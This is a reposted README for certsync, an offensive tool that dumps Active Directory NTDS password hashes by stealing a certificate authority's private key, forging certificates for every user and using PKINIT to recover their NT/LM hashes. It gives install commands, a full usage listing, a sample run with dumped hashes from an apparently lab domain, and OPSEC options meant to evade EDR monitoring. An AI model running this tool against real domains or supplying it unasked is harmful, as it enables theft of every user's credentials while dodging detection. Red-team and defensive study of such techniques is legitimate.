Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash


certsync is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses golden certificate and UnPAC the hash. It works in several steps:

  1. Dump user list, CA informations and CRL from LDAP
  2. Dump CA certificate and private key
  3. Forge offline a certificate for every user
  4. UnPAC the hash for every user in order to get nt and lm hashes
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12[*] Collecting userlist, CA info and CRL on LDAP[*] Found 13 users in LDAP[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)[*] Dumping CA certificate and private key[*] Forging certificates for every users. This can take some time...[*] PKINIT + UnPAC the hashesESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb   5c9d37021:::ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

Contrary to what we may think, the attack is not at all slower.


Installation

git clone https://github.com/zblurx/certsynccd certsyncpip install .

or

pip install certsync

Usage

$ certsync -husage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH]                [-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address]                [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]Dump NTDS with golden certificates and PKINIToptions:  -h, --help            show this help message and exit  -debug                Turn DEBUG output ON  -outputfile OUTPUTFILE                        base output filenameCA options:  -ca-pfx pfx/p12 file name                        Path to CA certificate  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAPauthenticati   on options:  -d domain.local, -domain domain.local                        Domain name  -u username, -username username                        Username  -p password, -password password                        Password  -hashes LMHASH:NTHASH                        NTLM hashes, format is LMHASH:NTHASH  -no-pass              don't ask for password (useful for -k)  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it                        will use the ones specified in the command line  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)  -use-kcache           Use Kerberos authe   ntication from ccache file (KRB5CCNAME)  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameterconnection options:  -scheme ldap scheme  -ns nameserver        Nameserver for DNS resolution  -dns-tcp              Use TCP instead of UDP for DNS queries  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameterOPSEC options:  -ldap-filter LDAP_FILTER                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))  -template cert.pfx    base template to use in order to forge certificates  -timeout timeout      Timeout between PKINIT connection  -jitter jitter        Jitter between PKINIT connecti   on  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

Why

DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, certsync does not require to use a Domain Administrator, it only require a CA Administrator.

Requirements

This attack needs:

  • A configured Entreprise CA on an ADCS server in the domain,
  • PKINIT working,
  • An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.

Limitations

Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.

OPSEC

Some options were added to customize the behaviour of the tool:

  • -ldap-filter: change the LDAP filter used to select usernames to certsync.
  • -template: use an already delivered certificate to mimic it when forging users certificates.
  • -timeout and -jitter: change timeout between PKINIT authentication requests.
  • -randomize: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.

Credits




Via: www.kitploit.com
Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash Reviewed by Zion3R on 0:38 Rating: 5